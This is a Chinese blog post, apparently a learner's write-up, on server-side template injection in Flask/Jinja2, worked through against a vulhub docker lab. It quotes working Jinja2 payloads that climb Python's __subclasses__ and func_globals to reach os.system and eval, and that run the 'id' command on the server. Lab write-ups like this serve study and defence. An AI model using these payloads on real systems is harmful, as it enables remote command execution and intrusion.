Home » Uncategorized » Flask(Jinja2) 服务端模板注入漏洞

Flask(Jinja2) 服务端模板注入漏洞

Flask(Jinja2) 服务端模板注入漏洞

 版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/lansatiankongxxc/article/details/78764726

其实我根本没用过flask模板,但是最近在学习python,研究下划线,莫名其妙地就学习到这里了。

首先搭建一个flask环境。在github上下一个docker
https://github.com/vulhub/vulhub/tree/master/flask/ssti
然后运行docker

先来看一下代码:
这里写图片描述
由此,在浏览器中输入

 http://your-ip/?name=leaf
  • 1

会出现 hello leaf
但在name后面也可以输入其他东西,比如:

 http://your-ip/?name={{1*1}}
  • 1

出现 hello 1

 http://your-ip/?name={{'aaa'.upper()}}
  • 1

出现AAA

由此就有大神找出了任意命令执行的方法了。
在python里要执行系统命令需要import os模块。

想要在模板中直接调用内置模块 os,即需要在模板环境中对其注册

需要在上面的代码里加一句:

t.globals['os'] = os
  • 1

如果没有加这一句,直接使用os中的方法会报错。
那么,如何在未注册 os 模块的情况下在模板中调用 popen() 函数执行系统命令呢?这就用到之前研究的各种下划线函数了。

先看下面的代码:
这里写图片描述
由此可以访问到很多其他模块,os模块自然也可以这样访问到。

查阅的其他资料,访问os模块都是从warnings.catch_warnings模块入手的。看一下catch_warnings在哪个位置。
这里写图片描述
知道了位置后,再用func_global看看该模块有哪些global函数
这里写图片描述
这里能看到linecache,我们要访问的os模块就在这里,看看这个模块的各种属性:
这里写图片描述
就能看到os模块了(图片太大,不贴了)。
既然找到了os,接下来就是使用它了。
这里写图片描述

[] .__class__.__base__.__subclasses__()[59] .__init__.func_globals[‘linecache’] .__dict__[‘os’] .system(‘id’)

现在看看怎么在Jinja2中直接构造命令执行代码,我对Jinja2还不算很熟悉,这里先放上两段大神的代码:

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings'%}

{{c.__init__.func_globals['linecache'].__dict__['os'].system('id'
) }}
{% endif %}

{% endfor %}
  • 1
  • 2
  • 3
  • 4
  • 5

当然也可以用eval函数,代码如下:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval'] ('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

最后放到浏览器里注意要url编码,就可以命令执行了
这里写图片描述